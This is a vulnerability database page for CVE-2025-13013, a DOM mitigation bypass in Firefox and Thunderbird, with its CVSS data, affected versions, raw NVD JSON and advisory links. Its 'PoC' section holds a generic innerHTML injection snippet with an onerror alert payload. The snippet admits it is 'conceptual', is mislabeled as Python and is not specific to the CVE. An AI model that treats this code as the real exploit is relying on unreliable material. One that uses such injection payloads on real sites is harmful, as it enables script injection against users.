Security Vulnerability Report
中文
CVE-2025-13013 CVSS 6.1 MEDIUM

CVE-2025-13013

Published: 2025-11-11 16:15:38
Last Modified: 2026-04-13 15:16:42

Description

Mitigation bypass in the DOM: Core & HTML component. This vulnerability was fixed in Firefox 145, Firefox ESR 140.5, Firefox ESR 115.30, Thunderbird 145, and Thunderbird 140.5.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE
Mozilla Firefox < 145
Mozilla Firefox ESR < 115.30
Mozilla Firefox ESR < 140.5
Mozilla Thunderbird < 140.5
Mozilla Thunderbird < 145

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13013 PoC - DOM Mitigation Bypass // Note: This is a conceptual PoC based on typical DOM bypass techniques // Actual exploit requires specific HTML construction function testDOMBypass() { // This PoC demonstrates the general concept of DOM mitigation bypass // The actual CVE-specific bypass involves specific HTML tag sequences // Example of potential bypass technique (conceptual) const maliciousHTML = ` <div> <!-- Potential bypass vectors --> <script type="text/html" id="bypass_template"> <img src=x onerror="alert('DOM Bypass')"> </script> <script> // Attempt to process template content const template = document.getElementById('bypass_template'); const container = document.createElement('div'); container.innerHTML = template.textContent; document.body.appendChild(container); </script> </div> `; // Create and inject the test element const testDiv = document.createElement('div'); testDiv.innerHTML = maliciousHTML; document.body.appendChild(testDiv); } // For testing purposes if (window.location.hash === '#test') { testDOMBypass(); } console.log('CVE-2025-13013 Test Environment Loaded');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13013", "sourceIdentifier": "[email protected]", "published": "2025-11-11T16:15:38.367", "lastModified": "2026-04-13T15:16:42.123", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mitigation bypass in the DOM: Core & HTML component. This vulnerability was fixed in Firefox 145, Firefox ESR 140.5, Firefox ESR 115.30, Thunderbird 145, and Thunderbird 140.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.30.0", "matchCriteriaId": "6A363BA6-4A06-4794-B7DF-59B1624097BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "145.0", "matchCriteriaId": "445D5AED-0882-46FE-A5F1-B7148B923221"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "140.0", "versionEndExcluding": "140.5.0", "matchCriteriaId": "E7561CC5-C090-4099-A311-1A0E304111FE"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1991945", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-87/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-88/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-89/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-90/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-91/", "source": "[email protected]"}]}}